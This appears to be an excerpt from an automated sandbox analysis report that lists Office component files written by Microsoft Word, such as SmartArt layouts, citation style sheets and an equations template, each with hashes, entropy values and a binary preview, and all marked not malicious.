                                                      Preview:MSCF....c.......D...........................c....?..................................ThemePictureAlternatingAccent.glox.................Content.inf...3.....[.... .qq...........\<.^......o."......f.o...x.{..q..^.MH^...........{0.K....4pX.i...@6A4X.P.01d....'p.......zA.......... .......7.......a. `.=!@- ......>G.s.k~@.a.lfha:m....1...@.,G`....{....W..N..qs.......j.+TrsT.l.9..L...1+...d..-u..-.......).#u&...3......k.&C...DdZ.'.......8..<PF..r.eq.X6...u..v...s5.m.Q.l.G%.<.]....RV<...S..Dv..s.r.......dh.N.3-.Hf'.....3.GZ..E.kt.5......h...|...?!.L....~.)..v....:2.../F.,....o.qi.i7..E.|.mh.R_.@A.FO@i.....Feo...x.l...{E.\W9|V...=#..3..(......tP.:i....Ox.U.N...%6...p.6&.....<zh.z.|.<Z.?.k....y7m...F.Z$-.:.l.h...{T..7....?..T...d,r...z?../...`/Z......a.v@)....u......V..v.:.._.|.'..[..O.s.OAt-."b.In"..I...J*.~H.:-...?..uV....dZ;z:.l.{.E.,.Q..i]:.0r.I.y..f...../j.wN...^R.....u....>..}....f.f...]A..C~;/....%..^#..N.a..........99.....`.....%..iS....S......$....)
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):19288
                                                      Entropy (8bit):7.570850633867256
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B9A6FF715719EE9DE16421AB983CA745
                                                      SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                      SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                      SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....H.......D...........................H....?..................................VaryingWidthList.glox.................Content.inf...O.....[.... v.q......R.....>.%i.I.HhD.V...qt.....'....N...!..aw$(J.%(..A..h......l|.D.p9`..Y09.:.u....p. :,.*.YD=0.p. ......w.........*..<..;.....u.."......7[....8.....?^........-..;q.|.....B....PJ....r.K#.#.0'...}.........+gpR...T....5.iu.^I...A\..gK....}..z.B.nT.../.m.......N....E'1.E.\..o.....W..R.#.#...8.7...R.SbW-...%......$.obj.F..W_@....sY!........s.O..."k. ..b....j....v...P.\....7d...|"J.T...2p..m.&..r..,2.).....X.`...xt].U...b.h..V.....|L..N.Z.O#....o...1R.w30.g..?;..C.T.:$..MGY.C"i\.f..#..<.k...m..s.w. ..Ga].....wt.h|.Ta<.......(SO.]9.%a..Z... r._JH.=O...P.9a.v.....Kj.".T...m...4.?...F...$...y.....hbW.UA..u.&)....py.C{.=t.....n...}|H3A9.=..W..JJ..y./Y.E.M9..Z..w. .HB.YoIi..i.e..9;n...SpHw,....f....d>..g.m..z...... ...f...KP.M..U.....~vFD.fQ.P?......2!.n.....`@C!G...XI.].s,.X.'...u.E.o..f
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):26944
                                                      Entropy (8bit):7.7574645319832225
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F913DD84915753042D856CEC4E5DABA5
                                                      SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                      SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                      SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....0*......D...........................0*...?..................t,..............ConvergingText.glox.....t,..........Content.inf..C..)t-[.....@.........=...xxA. ...E^....x.x.^.......x..^^...DF.......s..d.P.....5.;..]...2.t.w.....O9.G..;.'.T....@I.,.q.u.3..P...9... ....`J.......g.(....).,.h0.....$.3..;.._.....~.de.jj.....U..K.0....`.@.H.1.x.Z.@..q....?....x.wW.....+am8A".....I..)..]...s..-z.2S+|.Cb.t6f],.n.LV......OVg....O.at|..-..x.....:....]s...u..g}.P..v.3....^.".%..%...#.2.....l00...n.......r8.p.....^.....n.)..,..t.^$b...b.q.W...F..R...n.-.+..'........Aw=._OwH....8.:s..{.#..{N.hW..`.._........Wy....>U.?....-.8tg...=..y..@.,.v|......l...t..l#{...H....9..|......~...De..#@y.&K....U...q.c.zK..D.<pV.....Ql..&Y...=#...w....r.`#2....Ug.J(..T...KmW.@...!....j:......M......!..E.7#s.t..F.aU..N....-.i......|w.lr..G.n.,.......=Kl.-m.?F.....v]?.......{q.U.t...<.|..u.....3R.`.t.T.>;v.....KQ...S...7..1...N.kN.y.)v.....3H:..D.{.+.(......u..^W&.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31083
                                                      Entropy (8bit):7.814202819173796
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:89A9818E6658D73A73B642522FF8701F
                                                      SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                                      SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                                      SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....[:......D...........................[:...?...................A..............CircleProcess.glox......A..........Content.inf......9.B[.....@*........!...(A.D..K.W.wwpwJj\.K\w...]...K.!.....@0..?,...}won`... ....&I..(;.....X.u..^.R..^......_:....W>f\....T...B..i`|q.....................i.5....(........0q7@.@..F...?A.`.....,L.......5.+../56..a`....1C5..9.*I.N.......@|<+./......... .ya....>l.,t.......y.y5...FF.,F..jCA...SA..H....8u.L..eM?.w8.......~^.Mr.[...(.._......u..+.......j..TJ.:<.3.X`...U.bz...[...r-...[...+..B.......}...\'.i...C.8.B_...c.8</..s.....VQ.Y..m.,.j~;y ...2.5.VQ...K..jP..2..r-...HA...."..9).7.....5.E._.wq.......!.+n+.f...s].4M'.1&...5....4..k..NV.M1.7`a..<.P4.|.mrd.i.R...u...............v.}..n\.C$.....[..2c.^..W..g..._.0.C.o....%.z.!.;.@y.`\..UO#i.)...Q...........L. .\:_..H.{.W...@...T.4..A.a...Wo?o$4.....#.V.s8M.Gh..p?A...Y.....)...........r|...!..o9...8..%#.[....;...3<Z...g....~.Z....,.(...qA.'x#..xC..@...HOuW.[.[....c.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):7.840826397575377
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:62863124CDCDA135ECC0E722782CB888
                                                      SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                      SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                      SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....H......L............................H...?...................G......................APASixthEditionOfficeOnline.xsl.H...............Content.inf..h;.....[...Q..\..3S.5..oVP!i/Z.Ls...]q$...xY..+W.qm..B..y/.5.s..x$../K./.x.$.....}.......\........LNf..Hd.&."Ip.L.Mr-@.D..kW~i...^.....F.....T.U....../..0..2.{.q.T.`'{.00.{.B...>.R..2....1.~_.f..s...........~....~[..v..w..v....$[K.r$#[6...d;[...#.9.-...G..Z..eAR.0")%JI?&....$..$.H..$(........f.> k....hP...p...!j.T......l7..../3..(2^V...#..T9...3.@[0...le:...........E....YP.\.....au1...\.S|..-.duN.Z..g.O......X8....1.....|,.f/..w.|Wk]zJz.g'./7h..+.....}............x....s.2Z\..W.{...O....W.{j.U..Q....uO=.p.M k.E.S{SUd.@....S.Syo8>......r......8..............Z?>.mUAg....?o....f.7..W.n...P..........d.S?...\..W`...c.ua..........#.Y...45...F(d.o\09^..[.}...BsT.SD..[l.8..uw.7l..S.9T.KR..o......V..]...M .....t.r...:P...M....4.F.....@..t.1t..S...k.2.|5...i.%H..<.J..*.0n.....lZ.....?.*?.~..O .)..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):28911
                                                      Entropy (8bit):7.7784119983764715
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:6D787B1E223DB6B91B69238062CCA872
                                                      SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                      SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                      SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):33610
                                                      Entropy (8bit):7.8340762758330476
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:51804E255C573176039F4D5B55C12AB2
                                                      SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                      SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                      SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):32833
                                                      Entropy (8bit):7.825460303519308
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:205AF51604EF96EF1E8E60212541F742
                                                      SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                      SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                      SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....1A......L...........................1A...?..................S@......v...............iso690.xsl.................Content.inf.B.9.....[...A.c...32.E...P..'.^}.f...ikMJ....m..s..U.w{m{{...}n.4........I. ..9..d..I.......P|....F...F.......&&J.:I.34......+*M3..4mr.........m.r..m)....dK.wiw...H,...r........y.$..Cu...L...dH.../..V......g.PG$R39...4O..............{w..^....c.m.m.o.....#..Fgs..6.....b....3.I..O....B..B..1h"....K|f .41......_..g.N.<.>........(....o3a.M)....J..}....-......8.......g.hm!r<...-..1.1....q.?....S.m...`L.g#.K.igv.].ghD....L...p5..?.......iP.[JS.J..?z~.T/.Q...E.K.......P+\LW.-.c..[9.n.7.....P...*[.A1....m...4h.9...N[....h5 n%k.~RR.*c..n..=...4....).eH.-./..>....*.r..S.*..dE.........pF..s.A..?...f..u.+.{..?>N.4].}Xb.M......y......'.2..'..........J4{r..r.3........5>..a0.>.u_.y@g....+y.yu--,ZdD.........5]3..'.s...|.....K.....T..G.G.e...)..\x..OM.g...`..j0......BfH...+.....:......l`.qU...;.@...",.."........>;P.B.^F...3!......Rx.9..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):30957
                                                      Entropy (8bit):7.808231503692675
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                      SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                      SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                      SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....9......L............................9...?...................8......1P..............iso690nmerical.xsl.................Content.inf...A@...[...5.....33.E...P.../..........5sv.]3srm8.T.=.......}.v.T.. ..4IH.r.%Z.(.q.\+K..[,....E....A......#CEF..}p..Y/s$...YKI.#M.?.t.1#C....I..v.vn...-...v7../S.m.Ma.....!.Y....4.......3.3....c&R9..%......(J..BDMI.>7J.....".....}.w.}w.wg.v...^.n.{....{f.mlI..%.#..I..S....D..QJ U......4........K.(@....DH.....}...8;..z...&0%e..G.OAM..x.3......\....zS9....}......89.B...e.W.p{;.....m.m3...}....../...q.~..;.,..".j.g..^N............iC.../|...g.=..9.Q].Gf.....QA....74..v.....9.n[......0.}..jo{y./.2..Ym......;u...b.(Jz^.....~..uM...{s../..#.)n2..S.S.c..6)U.V....!.'R.......P.S.D..S.p/......D.......{......?.u.",...Mp._....N..+..=Y#..&0w....r.......$.xwC......P.e7.>O....7....].y%q^S'....*.C.`.?..}Q..k../u.TK...y........S...{T.?......[.H.'L..AS.Y.|*..b...J.H-.^U>'9..uD[.".b[.l.......o..6.L).h.B0RJa.b..|m:.):......F
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31008
                                                      Entropy (8bit):7.806058951525675
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                      SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                      SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                      SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31471
                                                      Entropy (8bit):7.818389271364328
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:91AADBEC4171CFA8292B618492F5EF34
                                                      SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                      SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                      SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31562
                                                      Entropy (8bit):7.81640835713744
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                      SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                      SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                      SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....:<......L...........................:<...?..................D;.......V..............harvardanglia2008officeonline.xsl.L...............Content.inf.Vu......[...E..o..3D.5..nF.A..+.e.....6r..f........M3...-.s.m.... $r.b.!.q!.....G...0.\.......fd......%m...'1Y..f..O...*.#.P.,{..m...|..ww.{.m...f...n%...,..y...0y...8.Q...`.../.q....a...',.V......8.7..8t..................6.]..6..nw..ynm..-l.Y..,.I?..$....+b9$E!S@"..) .4........H...lA...@!a.F.l$..0#!.....n&.5j.t+..1f|.+....E.zDk.l8.+<q.^.........\5.l..iT.9...........Y..6.^,.o.bn.E*5w..s.../...W.gS..j9..'W.F......].4\Mzz..Td..Ho..~.Q...Z..D..O.JP..m..s.j.:..........y._.....#.*.rD....60.\!y........p.o3,..Ub,......[[L.{.5.....5.7UDB9.{;;g.z.z..jM.G.MY.oe.....(r..B6..CV.7Fl.Z/....-.O.vY.c...-..........b.T)3.u..f~x2.?.8.g.x.-.....Qt_...$e.l..jtP..b....h..*.sW0.`.....c...F_....t.........LC..*5I.X$^.;&....#.._\J..........;..wP..wX.qy.qs...}46..fK.XN.&0........k1....8...............'t.......}.......O_.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):31605
                                                      Entropy (8bit):7.820497014278096
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                      SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                      SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                      SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....e<......L...........................e<...?...................;......................gostname.xsl."...............Content.inf.[.......[...>..|..32.E..o`h....W.>.^...v..5...m.w.$.U..U......m.mu...'4....m`.9F.. ...I..PTS..O.D...GM#...#CUE.`.`%n..N...G,.~..+.6cv.L...G.m.Y..vy.....Yh9/.m,..wtw..;....Ka.a.{.\...'.....<X....%)...G..d......R./..4$..32..@....f.h....w..ov.}w..[.....{.v.......dr..&w#G..$3.zI&f..(C..L.z5J... .`...!.!4. ...!.` .$........w.J.X7.w_..@.w..f]=.C.....I-....s.s_.x...~..A... ...z...nM..;....Z....vt....6...~.w.....*x.g.h.T.J..-.3=....G.n..ti.A...s...j$.Bf..?......6.t.<j...>.."....&=BO?w.uN.o.t.-r..K....>C..^G..p...k...>.xZ.[fL..n.."].W#...|.i.0W.q.F: ..<#w......w....s....."...n.qu.../rI.....q....P~.B..|b?.N.}..MyO..q..:q.7..-~.xa.S...|.....X.....g.W.3.mo..yy.GG.s>....qy....r........#.F.P..A.......A....b.2..14.8.i6..w.S...v~{0z.<.Z...^!.;2mSV.i....{...U...+...r.;...h.++..T6.a...$....j5F+..1t....b......|.Q\d-.S..2... ......Y..A...s....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):35519
                                                      Entropy (8bit):7.846686335981972
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:53EE9DA49D0B84357038ECF376838D2E
                                                      SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                      SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                      SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....K......L............................K...?...................J.......@..............turabian.xsl."...............Content.inf._.......[...T.....C4.5...E0B.]...+.-f....rc.[52.$...a..I....{z...`hx.r...!.. $...l..\....#3EF..r..c;<p...&n.\b..K..0Y..c+.2...i..B..wwY..77,...........}.q.C.......n..,.....prrx.QHy.B#..,.'....3....%1.``..hf...~...[.[n.v.s..y.vw....;..s.G293G&H....$E......m.&^..iy/.4.C...D...".(H&..&.I4._...!...... ........q.k1.d.....qc.3.c.....;.5.......y}...}&...+.WAN.,zVY.Q....V.Tz........g..H..c...E2jY...4g?.yf<....V.M.s.$..k.Id....+..?..._.\.s.k..9..I%;.yWQ..S..]..*.n<.7........=......"Q.*E.....MG..j.Yt..!U....Q.j...v.h-.~b..e&.......;...\.....:.....=..Xv1&q........6\...xw.%*.VdS..H...o...s.....+..%[../>.t..I....F.....".G|.....=....[..S..3..a.C.ZZ...tK.6N..b........)>........I..m..QE.M.nv.MVl.....vCG>,.suP.gqo.rr....J`m....J.b..},[F*....e.A.]..r....C4.?JJs6..l.].9...Q.B.~.......\d%.X ...8A....rH....&?#...^.....4.h.{>
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):43653
                                                      Entropy (8bit):7.899157106666598
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:DA3380458170E60CBEA72602FDD0D955
                                                      SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                                      SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                                      SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                                      Malicious:false
                                                      Reputation:unknown
